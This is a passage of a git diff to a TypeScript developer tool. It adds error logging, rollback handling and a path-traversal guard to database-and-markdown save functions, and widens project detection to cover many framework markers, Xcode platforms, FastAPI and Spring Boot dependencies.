+        fn: 'saveDecisionToDb',
+        error: String((deferErr as Error).message),
+      });
+    }
+
     // Invalidate file-read caches so deriveState() sees the updated markdown.
     // Do NOT clear the artifacts table — we just wrote to it intentionally.
     invalidateStateCache();
@@ -241,11 +502,44 @@ export async function saveDecisionToDb(
 
     return { id };
   } catch (err) {
-    process.stderr.write(`gsd-db: saveDecisionToDb failed: ${(err as Error).message}\n`);
+    logError('manifest', 'saveDecisionToDb failed', { fn: 'saveDecisionToDb', error: String((err as Error).message) });
     throw err;
   }
 }
 
+/**
+ * Extract a milestone/slice reference from a deferral decision.
+ *
+ * Detects deferrals by checking:
+ *   - scope contains "defer" (e.g., "deferral", "defer")
+ *   - choice or decision contains "defer" + an M###/S## pattern
+ *
+ * Returns { milestoneId, sliceId } if found, null otherwise.
+ */
+export function extractDeferredSliceRef(
+  fields: Pick<SaveDecisionFields, 'scope' | 'decision' | 'choice'>,
+): { milestoneId: string; sliceId: string } | null {
+  const isDeferral =
+    /\bdefer(?:ral|red|ring|s)?\b/i.test(fields.scope) ||
+    /\bdefer(?:ral|red|ring|s)?\b/i.test(fields.choice) ||
+    /\bdefer(?:ral|red|ring|s)?\b/i.test(fields.decision);
+
+  if (!isDeferral) return null;
+
+  // Look for M###/S## pattern in choice first, then decision
+  const slicePattern = /\b(M\d{3,4})\/(S\d{2,3})\b/;
+  const choiceMatch = fields.choice.match(slicePattern);
+  if (choiceMatch) {
+    return { milestoneId: choiceMatch[1], sliceId: choiceMatch[2] };
+  }
+  const decisionMatch = fields.decision.match(slicePattern);
+  if (decisionMatch) {
+    return { milestoneId: decisionMatch[1], sliceId: decisionMatch[2] };
+  }
+
+  return null;
+}
+
 // ─── Update Requirement in DB + Regenerate Markdown ───────────────────────
 
 /**
@@ -260,16 +554,55 @@ export async function updateRequirementInDb(
   try {
     const db = await import('./gsd-db.js');
 
-    const existing = db.getRequirementById(id);
+    let existing = db.getRequirementById(id);
+
+    // If requirement doesn't exist in DB, seed the entire requirements table
+    // from REQUIREMENTS.md first (#3346). This handles the standard workflow
+    // where requirements are authored in markdown during discussion but never
+    // imported into the database — making gsd_requirement_update always fail
+    // with "not_found" at milestone completion.
     if (!existing) {
-      throw new GSDError(GSD_STALE_STATE, `Requirement ${id} not found`);
+      const reqFilePath = resolveGsdRootFile(basePath, 'REQUIREMENTS');
+      try {
+        const content = readFileSync(reqFilePath, 'utf-8');
+        const { parseRequirementsSections } = await import('./md-importer.js');
+        const parsed = parseRequirementsSections(content);
+        if (parsed.length > 0) {
+          logWarning('manifest', `Seeding ${parsed.length} requirements from REQUIREMENTS.md into DB (first update triggers import)`, { fn: 'updateRequirementInDb' });
+          for (const req of parsed) {
+            // Only seed if not already in DB (avoid overwriting concurrent inserts)
+            if (!db.getRequirementById(req.id)) {
+              db.upsertRequirement(req);
+            }
+          }
+          // Re-check after seeding
+          existing = db.getRequirementById(id);
+        }
+      } catch {
+        // REQUIREMENTS.md missing or unparseable — fall through to skeleton
+      }
     }
 
-    // Merge updates into existing
+    const base: Requirement = existing ?? {
+      id,
+      class: '',
+      status: 'active',
+      description: '',
+      why: '',
+      source: '',
+      primary_owner: '',
+      supporting_slices: '',
+      validation: '',
+      notes: '',
+      full_content: '',
+      superseded_by: null,
+    };
+
+    // Merge updates into existing (or skeleton)
     const merged: Requirement = {
-      ...existing,
+      ...base,
       ...updates,
-      id: existing.id, // ID cannot be changed
+      id: base.id, // ID cannot be changed
     };
 
     db.upsertRequirement(merged);
@@ -301,14 +634,22 @@ export async function updateRequirementInDb(
 
     const md = generateRequirementsMd(nonSuperseded);
     const filePath = resolveGsdRootFile(basePath, 'REQUIREMENTS');
-    await saveFile(filePath, md);
+    try {
+      await saveFile(filePath, md);
+    } catch (diskErr) {
+      logError('manifest', 'disk write failed, reverting DB row', { fn: 'updateRequirementInDb', error: String((diskErr as Error).message) });
+      if (existing) {
+        db.upsertRequirement(existing);
+      }
+      throw diskErr;
+    }
     // Invalidate file-read caches so deriveState() sees the updated markdown.
     // Do NOT clear the artifacts table — we just wrote to it intentionally.
     invalidateStateCache();
     clearPathCache();
     clearParseCache();
   } catch (err) {
-    process.stderr.write(`gsd-db: updateRequirementInDb failed: ${(err as Error).message}\n`);
+    logError('manifest', 'updateRequirementInDb failed', { fn: 'updateRequirementInDb', error: String((err as Error).message) });
     throw err;
   }
 }
@@ -336,29 +677,55 @@ export async function saveArtifactToDb(
   try {
     const db = await import('./gsd-db.js');
 
+    // Guard against path traversal before any reads/writes
+    const gsdDir = resolve(basePath, '.gsd');
+    const fullPath = resolve(basePath, '.gsd', opts.path);
+    if (!fullPath.startsWith(gsdDir)) {
+      throw new GSDError(GSD_IO_ERROR, `saveArtifactToDb: path escapes .gsd/ directory: ${opts.path}`);
+    }
+
+    // Shrinkage guard: if the file already exists and the new content is
+    // significantly smaller (<50%), preserve the richer file on disk and
+    // store its content in the DB instead of the abbreviated version.
+    let dbContent = opts.content;
+    let skipDiskWrite = false;
+    if (existsSync(fullPath)) {
+      const existingSize = statSync(fullPath).size;
+      const newSize = Buffer.byteLength(opts.content, 'utf-8');
+      if (existingSize > 0 && newSize < existingSize * 0.5) {
+        logWarning('manifest', `new content (${newSize}B) is <50% of existing file (${existingSize}B), preserving disk file`, { fn: 'saveArtifactToDb', path: opts.path });
+        dbContent = readFileSync(fullPath, 'utf-8');
+        skipDiskWrite = true;
+      }
+    }
+
     db.insertArtifact({
       path: opts.path,
       artifact_type: opts.artifact_type,
       milestone_id: opts.milestone_id ?? null,
       slice_id: opts.slice_id ?? null,
       task_id: opts.task_id ?? null,
-      full_content: opts.content,
+      full_content: dbContent,
     });
 
-    // Write the file to disk (guard against path traversal)
-    const gsdDir = resolve(basePath, '.gsd');
-    const fullPath = resolve(basePath, '.gsd', opts.path);
-    if (!fullPath.startsWith(gsdDir)) {
-      throw new GSDError(GSD_IO_ERROR, `saveArtifactToDb: path escapes .gsd/ directory: ${opts.path}`);
+    // Write the file to disk (only if we're not preserving a richer existing file)
+    if (!skipDiskWrite) {
+      try {
+        await saveFile(fullPath, opts.content);
+      } catch (diskErr) {
+        logError('manifest', 'disk write failed, rolling back DB row', { fn: 'saveArtifactToDb', error: String((diskErr as Error).message) });
+        const rollbackAdapter = db._getAdapter();
+        rollbackAdapter?.prepare('DELETE FROM artifacts WHERE path = :path').run({ ':path': opts.path });
+        throw diskErr;
+      }
     }
-    await saveFile(fullPath, opts.content);
     // Invalidate file-read caches so deriveState() sees the updated markdown.
     // Do NOT clear the artifacts table — we just wrote to it intentionally.
     invalidateStateCache();
     clearPathCache();
     clearParseCache();
   } catch (err) {
-    process.stderr.write(`gsd-db: saveArtifactToDb failed: ${(err as Error).message}\n`);
+    logError('manifest', 'saveArtifactToDb failed', { fn: 'saveArtifactToDb', error: String((err as Error).message) });
     throw err;
   }
 }
diff --git a/src/resources/extensions/gsd/detection.ts b/src/resources/extensions/gsd/detection.ts
index 9a0c159eb..3cfa9bdb8 100644
--- a/src/resources/extensions/gsd/detection.ts
+++ b/src/resources/extensions/gsd/detection.ts
@@ -6,7 +6,7 @@
  * flow to show when entering a project directory.
  */
 
-import { existsSync, readdirSync, readFileSync, statSync } from "node:fs";
+import { existsSync, openSync, readSync, closeSync, readdirSync, readFileSync, statSync } from "node:fs";
 import { join } from "node:path";
 import { homedir } from "node:os";
 import { gsdRoot } from "./paths.js";
@@ -48,6 +48,9 @@ export interface V2Detection {
   hasContext: boolean;
 }
 
+/** Apple platform SDKROOTs found in Xcode project.pbxproj files. */
+export type XcodePlatform = "iphoneos" | "macosx" | "watchos" | "appletvos" | "xros";
+
 export interface ProjectSignals {
   /** Detected project/package files */
   detectedFiles: string[];
@@ -57,6 +60,8 @@ export interface ProjectSignals {
   isMonorepo: boolean;
   /** Primary language hint */
   primaryLanguage?: string;
+  /** Apple platform SDKROOTs detected from *.xcodeproj/project.pbxproj */
+  xcodePlatforms: XcodePlatform[];
   /** Has existing CI configuration? */
   hasCI: boolean;
   /** Has existing test setup? */
@@ -87,8 +92,91 @@ export const PROJECT_FILES = [
   "mix.exs",
   "deno.json",
   "deno.jsonc",
+  // .NET
+  ".sln",
+  ".csproj",
+  "Directory.Build.props",
+  // Git submodules
+  ".gitmodules",
+  // Xcode
+  "project.yml",
+  ".xcodeproj",
+  ".xcworkspace",
+  // Cloud platform config files
+  "firebase.json",
+  "cdk.json",
+  "samconfig.toml",
+  "serverless.yml",
+  "serverless.yaml",
+  "azure-pipelines.yml",
+  // Database / ORM config files
+  "prisma/schema.prisma",
+  "supabase/config.toml",
+  "drizzle.config.ts",
+  "drizzle.config.js",
+  "redis.conf",
+  // React Native markers
+  "metro.config.js",
+  "metro.config.ts",
+  "react-native.config.js",
+  // Frontend framework config files
+  "angular.json",
+  "next.config.js",
+  "next.config.ts",
+  "next.config.mjs",
+  "nuxt.config.ts",
+  "nuxt.config.js",
+  "svelte.config.js",
+  "svelte.config.ts",
+  // Vue CLI config files
+  "vue.config.js",
+  "vue.config.ts",
+  // Frontend tooling
+  "tailwind.config.js",
+  "tailwind.config.ts",
+  "tailwind.config.mjs",
+  "tailwind.config.cjs",
+  // Android project markers
+  "app/build.gradle",
+  "app/build.gradle.kts",
+  // Container / DevOps config files
+  "Dockerfile",
+  "docker-compose.yml",
+  "docker-compose.yaml",
+  // Infrastructure as Code
+  "main.tf",
+  // Kubernetes / Helm markers
+  "Chart.yaml",
+  "kustomization.yaml",
+  // CI/CD markers
+  ".github/workflows",
+  // Blockchain / Web3 markers
+  "hardhat.config.js",
+  "hardhat.config.ts",
+  "foundry.toml",
+  // Data engineering markers
+  "dbt_project.yml",
+  "airflow.cfg",
+  // Game engine markers
+  "ProjectSettings/ProjectVersion.txt",
+  "project.godot",
+  // Python framework markers
+  "manage.py",
+  "requirements.txt",
 ] as const;
 
+/** File extensions that indicate SQLite databases in the project. */
+const SQLITE_EXTENSIONS = [".sqlite", ".sqlite3", ".db"] as const;
+
+/** File extensions that indicate SQL usage (migrations, schemas, seeds). */
+const SQL_EXTENSIONS = [".sql"] as const;
+
+/** File extensions that indicate .NET / C# projects. */
+const DOTNET_EXTENSIONS = [".csproj", ".sln", ".fsproj"] as const;
+
+/** File extensions that indicate Vue.js single-file components. */
+const VUE_EXTENSIONS = [".vue"] as const;
+
 const LANGUAGE_MAP: Record<string, string> = {
   "package.json": "javascript/typescript",
   "Cargo.toml": "rust",
@@ -99,6 +187,8 @@ const LANGUAGE_MAP: Record<string, string> = {
   "pom.xml": "java",
   "build.gradle": "java/kotlin",
   "build.gradle.kts": "kotlin",
+  "app/build.gradle": "java/kotlin",
+  "app/build.gradle.kts": "kotlin",
   "CMakeLists.txt": "c/c++",
   "composer.json": "php",
   "pubspec.yaml": "dart/flutter",
@@ -106,6 +196,15 @@ const LANGUAGE_MAP: Record<string, string> = {
   "mix.exs": "elixir",
   "deno.json": "typescript/deno",
   "deno.jsonc": "typescript/deno",
+  ".sln": "dotnet",
+  ".csproj": "dotnet",
+  "Directory.Build.props": "dotnet",
+  "project.yml": "swift/xcode",
+  ".xcodeproj": "swift/xcode",
+  ".xcworkspace": "swift/xcode",
+  "Dockerfile": "docker",
+  "manage.py": "python",
+  "requirements.txt": "python",
 };
 
 const MONOREPO_MARKERS = [
@@ -140,6 +239,50 @@ const TEST_MARKERS = [
   "phpunit.xml",
 ] as const;
 
+/** Directories skipped during bounded recursive project scans. */
+const RECURSIVE_SCAN_IGNORED_DIRS = new Set([
+  ".git",
+  ".gsd",
+  ".planning",
+  ".plans",
+  ".claude",
+  ".cursor",
+  ".vscode",
+  "node_modules",
+  ".venv",
+  "venv",
+  "dist",
+  "build",
+  "coverage",
+  ".next",
+  ".nuxt",
+  "target",
+  "vendor",
+  ".turbo",
+  "Pods",
+  "bin",
+  "obj",
+  ".gradle",
+  "DerivedData",
+  "out",
+]) as ReadonlySet<string>;
+
+/** Project file markers safe to detect recursively via suffix matching. */
+const ROOT_ONLY_PROJECT_FILES = new Set<string>([
+  ".github/workflows",
+  "package.json",
+  "Gemfile",
+  "Makefile",
+  "CMakeLists.txt",
+  "build.gradle",
+  "build.gradle.kts",
+  "deno.json",
+  "deno.jsonc",
+]);
+
+const MAX_RECURSIVE_SCAN_FILES = 2000;
+const MAX_RECURSIVE_SCAN_DEPTH = 6;
+
 // ─── Core Detection ─────────────────────────────────────────────────────────────
 
 /**
@@ -222,8 +365,8 @@ function detectV2Gsd(basePath: string): V2Detection | null {
   if (!existsSync(gsdPath)) return null;
 
   const hasPreferences =
-    existsSync(join(gsdPath, "preferences.md")) ||
-    existsSync(join(gsdPath, "PREFERENCES.md"));
+    existsSync(join(gsdPath, "PREFERENCES.md")) ||
+    existsSync(join(gsdPath, "preferences.md"));
 
   const hasContext = existsSync(join(gsdPath, "CONTEXT.md"));
 
@@ -261,9 +404,88 @@ export function detectProjectSignals(basePath: string): ProjectSignals {
     }
   }
 
+  // Bounded recursive scan for nested markers and dependency files.
+  // This covers common brownfield layouts like src/App/App.csproj,
+  // db/migrations/*.sql, src/components/*.vue, and services/api/pyproject.toml
+  // without walking the entire repo or diving into heavyweight folders.
+  const scannedFiles = scanProjectFiles(basePath);
+
+  for (const file of PROJECT_FILES) {
+    if (detectedFiles.includes(file) || ROOT_ONLY_PROJECT_FILES.has(file)) continue;
+    const hasMatch = file === "requirements.txt"
+      ? scannedFiles.some(isPythonRequirementsFile)
+      : scannedFiles.some((scannedFile) => matchesProjectFileMarker(scannedFile, file));
+    if (hasMatch) {
+      pushUnique(detectedFiles, file);
+      if (!primaryLanguage && LANGUAGE_MAP[file]) {
+        primaryLanguage = LANGUAGE_MAP[file];
+      }
+    }
+  }
+
+  if (scannedFiles.some((file) => SQLITE_EXTENSIONS.some((ext) => file.endsWith(ext)))) {
+    pushUnique(detectedFiles, "*.sqlite");
+  }
+  if (scannedFiles.some((file) => SQL_EXTENSIONS.some((ext) => file.endsWith(ext)))) {
+    pushUnique(detectedFiles, "*.sql");
+  }
+
+  const hasCsproj = scannedFiles.some((file) => file.endsWith(".csproj"));
+  const hasFsproj = scannedFiles.some((file) => file.endsWith(".fsproj"));
+  const hasSln = scannedFiles.some((file) => file.endsWith(".sln"));
+
+  if (hasCsproj) {
+    pushUnique(detectedFiles, "*.csproj");
+    if (!primaryLanguage) primaryLanguage = "csharp";
+  }
+  if (hasFsproj) {
+    pushUnique(detectedFiles, "*.fsproj");
+    if (!primaryLanguage) primaryLanguage = "fsharp";
+  }
+  if (hasSln) {
+    pushUnique(detectedFiles, "*.sln");
+    if (!primaryLanguage) primaryLanguage = "dotnet";
+  }
+
+  if (scannedFiles.some((file) => VUE_EXTENSIONS.some((ext) => file.endsWith(ext)))) {
+    pushUnique(detectedFiles, "*.vue");
+  }
+
+  // Python framework detection — scan dependency files for framework-specific packages.
+  // Adds synthetic markers (e.g. "dep:fastapi") so skill catalog matchFiles can reference them.
+  const dependencyFiles = scannedFiles.filter((file) =>
+    isPythonRequirementsFile(file) || file.endsWith("pyproject.toml"),
+  );
+  if (containsFastapiDependency(basePath, dependencyFiles)) {
+    pushUnique(detectedFiles, "dep:fastapi");
+  }
+
+  const springBootBuildFiles = scannedFiles.filter((file) =>
+    file.endsWith("pom.xml") || file.endsWith("build.gradle") || file.endsWith("build.gradle.kts"),
+  );
+  const springBootVersionCatalogs = scannedFiles.filter((file) => file.endsWith(".versions.toml"));
+  const springBootSettingsFiles = scannedFiles.filter((file) =>
+    file.endsWith("settings.gradle") || file.endsWith("settings.gradle.kts"),
+  );
+  if (containsSpringBootMarker(basePath, springBootBuildFiles, springBootVersionCatalogs, springBootSettingsFiles)) {
+    pushUnique(detectedFiles, "dep:spring-boot");
+    if (!primaryLanguage) {
+      primaryLanguage = "java/kotlin";
+    }
+  }
+
   // Git repo detection
   const isGitRepo = existsSync(join(basePath, ".git"));
 
+  // Xcode platform detection — parse SDKROOT from project.pbxproj
+  const xcodePlatforms = detectXcodePlatforms(basePath);
+
+  // Set primaryLanguage to swift when an Xcode project is found but no
+  // Package.swift was detected (CocoaPods or SPM-less projects).
+  if (!primaryLanguage && xcodePlatforms.length > 0) {
+    primaryLanguage = "swift";
+  }
+
   // Monorepo detection
   let isMonorepo = false;
   for (const marker of MONOREPO_MARKERS) {
@@ -306,6 +528,7 @@ export function detectProjectSignals(basePath: string): ProjectSignals {
     isGitRepo,
     isMonorepo,
     primaryLanguage,
+    xcodePlatforms,
     hasCI,
     hasTests,
     packageManager,
@@ -313,6 +536,100 @@ export function detectProjectSignals(basePath: string): ProjectSignals {
   };
 }
 
+// ─── Xcode Platform Detection ───────────────────────────────────────────────────
+
+/** Known SDKROOT values → canonical platform names. */
+const SDKROOT_MAP: Record<string, XcodePlatform> = {
+  iphoneos: "iphoneos",
+  iphonesimulator: "iphoneos",      // simulator builds still target iOS
+  macosx: "macosx",
+  watchos: "watchos",
+  watchsimulator: "watchos",
+  appletvos: "appletvos",
+  appletvsimulator: "appletvos",
+  xros: "xros",
+  xrsimulator: "xros",
+};
+
+/** Regex for SUPPORTED_PLATFORMS — fallback when SDKROOT = auto (Xcode 15+). */
+const SUPPORTED_PLATFORMS_RE = /SUPPORTED_PLATFORMS\s*=\s*"([^"]+)"/gi;
+
+/** Read at most `maxBytes` from a file without loading the full file into memory. */
+function readBounded(filePath: string, maxBytes: number): string {
+  const buf = Buffer.alloc(maxBytes);
+  const fd = openSync(filePath, "r");
+  try {
+    const bytesRead = readSync(fd, buf, 0, maxBytes, 0);
+    return buf.toString("utf-8", 0, bytesRead);
+  } finally {
+    closeSync(fd);
+  }
+}
+
+/** Common subdirectories where .xcodeproj may live in monorepos / standard layouts. */
+const XCODE_SUBDIRS = ["ios", "macos", "app", "apps"] as const;
+
+/**
+ * Scan *.xcodeproj directories for project.pbxproj and extract SDKROOT values.
+ * Returns deduplicated, canonical platform list (e.g. ["iphoneos"]).
+ *
+ * Reading the pbxproj is a lightweight regex scan — no full plist parsing needed.
+ * We read at most 1 MB per file to keep detection fast.
+ * Searches both the project root and common subdirectories (ios/, macos/, app/).
+ */
+function detectXcodePlatforms(basePath: string): XcodePlatform[] {
+  const platforms = new Set<XcodePlatform>();
+
+  // Directories to scan: project root + common subdirs
+  const dirsToScan = [basePath];
+  for (const sub of XCODE_SUBDIRS) {
+    const subPath = join(basePath, sub);
+    if (existsSync(subPath)) dirsToScan.push(subPath);
+  }
+
+  for (const dir of dirsToScan) {
+    try {
+      const entries = readdirSync(dir, { withFileTypes: true });
+      for (const entry of entries) {
+        if (!entry.isDirectory() || !entry.name.endsWith(".xcodeproj")) continue;
+        const pbxprojPath = join(dir, entry.name, "project.pbxproj");
+        try {
+          const content = readBounded(pbxprojPath, 1024 * 1024);
+          // Match SDKROOT = <value>; — both quoted and unquoted forms
+          const sdkRe = /SDKROOT\s*=\s*"?([a-z]+)"?\s*;/gi;
+          let m: RegExpExecArray | null;
+          let foundExplicit = false;
+          while ((m = sdkRe.exec(content)) !== null) {
+            const val = m[1].toLowerCase();
+            if (val === "auto") continue; // handled below via SUPPORTED_PLATFORMS
+            const canonical = SDKROOT_MAP[val];
+            if (canonical) {
+              platforms.add(canonical);
+              foundExplicit = true;
+            }
+          }
+          // Xcode 15+ defaults SDKROOT to "auto"; fall back to SUPPORTED_PLATFORMS
+          if (!foundExplicit) {
+            let sp: RegExpExecArray | null;
+            while ((sp = SUPPORTED_PLATFORMS_RE.exec(content)) !== null) {
+              for (const tok of sp[1].split(/\s+/)) {
+                const canonical = SDKROOT_MAP[tok.toLowerCase()];
+                if (canonical) platforms.add(canonical);
+              }
+            }
+            SUPPORTED_PLATFORMS_RE.lastIndex = 0;
+          }
+        } catch {
+          // unreadable pbxproj — skip
+        }
+      }
+    } catch {
+      // unreadable directory
+    }
+  }
+  return [...platforms];
+}
+
 // ─── Package Manager Detection ──────────────────────────────────────────────────
 
 function detectPackageManager(basePath: string): string | undefined {
@@ -373,7 +690,7 @@ function detectVerificationCommands(
     commands.push("go vet ./...");
   }
 
-  if (detectedFiles.includes("pyproject.toml") || detectedFiles.includes("setup.py")) {
+  if (detectedFiles.includes("pyproject.toml") || detectedFiles.includes("setup.py") || detectedFiles.includes("requirements.txt")) {
     commands.push("pytest");
   }
 
@@ -403,8 +720,8 @@ function detectVerificationCommands(
  */
 export function hasGlobalSetup(): boolean {
   return (
-    existsSync(join(gsdHome, "preferences.md")) ||
-    existsSync(join(gsdHome, "PREFERENCES.md"))
+    existsSync(join(gsdHome, "PREFERENCES.md")) ||
+    existsSync(join(gsdHome, "preferences.md"))
   );
 }
 
@@ -417,8 +734,8 @@ export function isFirstEverLaunch(): boolean {
 
   // If we have preferences, not first launch
   if (
-    existsSync(join(gsdHome, "preferences.md")) ||
-    existsSync(join(gsdHome, "PREFERENCES.md"))
+    existsSync(join(gsdHome, "PREFERENCES.md")) ||
+    existsSync(join(gsdHome, "preferences.md"))
   ) {
     return false;
   }
@@ -468,3 +785,370 @@ function readMakefileTargets(basePath: string): string[] {
     return [];
   }
 }
+
+function pushUnique(arr: string[], value: string): void {
+  if (!arr.includes(value)) arr.push(value);
+}
+
+function matchesProjectFileMarker(scannedFile: string, marker: string): boolean {
+  const normalized = scannedFile.replaceAll("\\", "/");
+  return (
+    normalized === marker ||
+    normalized.endsWith(`/${marker}`)
+  );
+}
+
+function isPythonRequirementsFile(relativePath: string): boolean {
+  const normalized = relativePath.replaceAll("\\", "/");
+  const basename = normalized.slice(normalized.lastIndexOf("/") + 1);
+  return (
+    basename === "requirements.txt" ||
+    basename === "requirements.in" ||
+    /^requirements([-.].+)?\.(txt|in)$/i.test(basename) ||
+    /(^|\/)requirements\/.+\.(txt|in)$/i.test(normalized)
+  );
+}
+
+function containsFastapiDependency(basePath: string, relativePaths: string[]): boolean {
+  for (const relativePath of relativePaths) {
+    try {
+      const raw = readBounded(join(basePath, relativePath), 64 * 1024);
+      const content = extractDependencyContent(relativePath, raw);
+      if (isPythonRequirementsFile(relativePath)) {
+        for (const line of content.split("\n")) {
+          if (extractRequirementName(line) === "fastapi") return true;
+        }
+        continue;
+      }
+
+      if (relativePath.endsWith("pyproject.toml")) {
+        if (containsFastapiInPyproject(content)) return true;
+      }
+    } catch {
+      // unreadable file — continue scanning other candidate files
+    }
+  }
+
+  return false;
+}
+
+function containsSpringBootMarker(
+  basePath: string,
+  buildFiles: string[],
+  versionCatalogFiles: string[],
+  settingsFiles: string[],
+): boolean {
+  const usedPluginAliases = new Set<string>();
+  const usedLibraryAliases = new Set<string>();
+  const catalogAccessors = resolveVersionCatalogAccessors(basePath, versionCatalogFiles, settingsFiles);
+
+  for (const relativePath of buildFiles) {
+    try {
+      const raw = readBounded(join(basePath, relativePath), 64 * 1024);
+      const content = stripDependencyComments(relativePath, raw);
+      if (containsDirectSpringBootReference(relativePath, content)) {
+        return true;
+      }
+
+      const normalized = content.toLowerCase();
+      let match: RegExpExecArray | null;
+      for (const accessor of catalogAccessors) {
+        const aliasRe = new RegExp(`alias\\(\\s*${accessor}\\.plugins\\.([a-z0-9_.-]+)\\s*\\)`, "gi");
+        while ((match = aliasRe.exec(normalized)) !== null) {
+          usedPluginAliases.add(normalizePluginAlias(match[1]));
+        }
+
+        const libraryAliasRe = new RegExp(`\\b${accessor}\\.((?!plugins\\b)[a-z0-9_.-]+)`, "gi");
+        while ((match = libraryAliasRe.exec(normalized)) !== null) {
+          usedLibraryAliases.add(normalizePluginAlias(match[1]));
+        }
+      }
+    } catch {
+      // unreadable build file — continue scanning others
+    }
+  }
+
+  if (usedPluginAliases.size === 0 && usedLibraryAliases.size === 0) {
+    return false;
+  }
+  if (versionCatalogFiles.length === 0) {
+    return false;
+  }
+
+  const springBootAliases = new Set<string>();
+  const springBootLibraries = new Set<string>();
+  const pendingSpringBootBundles: Array<{ bundleAlias: string; referencedAliases: string[] }> = [];
+  for (const relativePath of versionCatalogFiles) {
+    try {
+      const raw = readBounded(join(basePath, relativePath), 64 * 1024);
+      const content = stripDependencyComments(relativePath, raw);
+      const aliasRe = /^\s*([A-Za-z0-9_.-]+)\s*=\s*\{[^\n}]*\bid\s*=\s*["']org\.springframework\.boot["'][^\n}]*\}/gm;
+      let match: RegExpExecArray | null;
+      while ((match = aliasRe.exec(content)) !== null) {
+        springBootAliases.add(normalizePluginAlias(match[1]));
+      }
+
+      const libraryRe = /^\s*([A-Za-z0-9_.-]+)\s*=\s*\{[^\n}]*\b(module\s*=\s*["']org\.springframework\.boot:[^"']+["']|group\s*=\s*["']org\.springframework\.boot["'][^\n}]*\bname\s*=\s*["']spring-boot[^"']*["'])[^\n}]*\}/gm;
+      while ((match = libraryRe.exec(content)) !== null) {
+        springBootLibraries.add(normalizePluginAlias(match[1]));
+      }
+
+      const bundleRe = /^\s*([A-Za-z0-9_.-]+)\s*=\s*\[([\s\S]*?)\]/gm;
+      while ((match = bundleRe.exec(content)) !== null) {
+        pendingSpringBootBundles.push({
+          bundleAlias: normalizePluginAlias(`bundles.${match[1]}`),
+          referencedAliases: match[2]
+            .split(",")
+            .map((part) => normalizePluginAlias(part.replace(/["'\s]/g, "")))
+            .filter(Boolean),
+        });
+      }
+    } catch {
+      // unreadable version catalog — continue scanning others
+    }
+  }
+
+  const springBootBundles = new Set<string>();
+  for (const pendingBundle of pendingSpringBootBundles) {
+    if (pendingBundle.referencedAliases.some((alias) => springBootLibraries.has(alias))) {
+      springBootBundles.add(pendingBundle.bundleAlias);
+    }
+  }
+
+  for (const alias of usedPluginAliases) {
+    if (springBootAliases.has(alias)) return true;
+  }
+  for (const alias of usedLibraryAliases) {
+    if (springBootLibraries.has(alias) || springBootBundles.has(alias)) return true;
+  }
+
+  return false;
+}
+
+function stripDependencyComments(relativePath: string, content: string): string {
+  if (relativePath.endsWith("requirements.txt")) {
+    return content.replace(/(^|\s)#.*$/gm, "");
+  }
+  if (relativePath.endsWith("pyproject.toml")) {
+    return content.replace(/(^|\s)#.*$/gm, "");
+  }
+  if (relativePath.endsWith(".versions.toml")) {
+    return content.replace(/(^|\s)#.*$/gm, "");
+  }
+  if (relativePath.endsWith("settings.gradle") || relativePath.endsWith("settings.gradle.kts")) {
+    return content
+      .replace(/\/\*[\s\S]*?\*\//g, "")
+      .replace(/\/\/.*$/gm, "");
+  }
+  if (relativePath.endsWith("pom.xml")) {
+    return content.replace(/<!--[\s\S]*?-->/g, "");
+  }
+  if (relativePath.endsWith("build.gradle") || relativePath.endsWith("build.gradle.kts")) {
+    return content
+      .replace(/\/\*[\s\S]*?\*\//g, "")
+      .replace(/\/\/.*$/gm, "");
+  }
+  return content;
+}
+
+function extractDependencyContent(relativePath: string, content: string): string {
+  const stripped = stripDependencyComments(relativePath, content);
+  if (relativePath.endsWith("pyproject.toml")) {
+    return extractPyprojectDependencySections(stripped);
+  }
+  return stripped;
+}
+
+function extractRequirementName(spec: string): string | null {
+  const trimmed = spec.trim().replace(/^["']|["']$/g, "");
+  if (!trimmed) return null;
+
+  const match = trimmed.match(/^([A-Za-z0-9_.-]+)(?:\[[^\]]+\])?(?=\s*(?:@|[<>=!~;]|$))/);
+  if (!match) return null;
+  return normalizePackageName(match[1]);
+}
+
+function containsFastapiInPyproject(content: string): boolean {
+  for (const line of content.split("\n")) {
+    const keyMatch = line.match(/^\s*([A-Za-z0-9_.-]+)\s*=/);
+    if (keyMatch) {
+      const key = normalizePackageName(keyMatch[1]);
+      if (key === "fastapi") {
+        return true;
+      }
+      if (key !== "dependencies") {
+        continue;
+      }
+    }
+
+    const quotedSpecRe = /["']([^"']+)["']/g;
+    let match: RegExpExecArray | null;
+    while ((match = quotedSpecRe.exec(line)) !== null) {
+      if (extractRequirementName(match[1]) === "fastapi") {
+        return true;
+      }
+    }
+  }
+
+  return false;
+}
+
+function containsDirectSpringBootReference(relativePath: string, content: string): boolean {
+  if (relativePath.endsWith("pom.xml")) {
+    return /<groupId>\s*org\.springframework\.boot\s*<\/groupId>/i.test(content);
+  }
+
+  if (relativePath.endsWith("build.gradle") || relativePath.endsWith("build.gradle.kts")) {
+    return /(id\s*\(?\s*["']org\.springframework\.boot["']|apply\s*\(?\s*plugin\s*[:=]\s*["']org\.springframework\.boot["']|(?:implementation|api|compileOnly|runtimeOnly|testImplementation|annotationProcessor|kapt)\s*\(?\s*["'][^"']*org\.springframework\.boot:[^"']*spring-boot[^"']*["'])/i.test(content);
+  }
+
+  return false;
+}
+
+function extractPyprojectDependencySections(content: string): string {
+  const lines = content.split("\n");
+  const collected: string[] = [];
+  let section = "";
+  let collectingProjectDeps = false;
+  let collectingOptionalDeps = false;
+  let bracketDepth = 0;
+
+  for (const line of lines) {
+    const trimmed = line.trim();
+
+    if (collectingProjectDeps) {
+      collected.push(line);
+      bracketDepth += countChar(line, "[") - countChar(line, "]");
+      if (bracketDepth <= 0) {
+        collectingProjectDeps = false;
+      }
+      continue;
+    }
+
+    if (collectingOptionalDeps) {
+      collected.push(line);
+      bracketDepth += countChar(line, "[") - countChar(line, "]");
+      if (bracketDepth <= 0) {
+        collectingOptionalDeps = false;
+      }
+      continue;
+    }
+
+    const sectionMatch = trimmed.match(/^\[([^\]]+)\]$/);
+    if (sectionMatch) {
+      section = sectionMatch[1].trim();
+      continue;
+    }
+
+    if (section === "project" && /^dependencies\s*=\s*\[/.test(trimmed)) {
+      collected.push(line);
+      bracketDepth = countChar(line, "[") - countChar(line, "]");
+      collectingProjectDeps = bracketDepth > 0;
+      continue;
+    }
+
+    if (
+      section === "project.optional-dependencies" ||
+      section === "tool.poetry.dependencies"
+    ) {
+      if (section === "project.optional-dependencies") {
+        const equalsIndex = line.indexOf("=");
+        if (equalsIndex !== -1) {
+          const value = line.slice(equalsIndex + 1);
+          collected.push(value);
+          bracketDepth = countChar(value, "[") - countChar(value, "]");
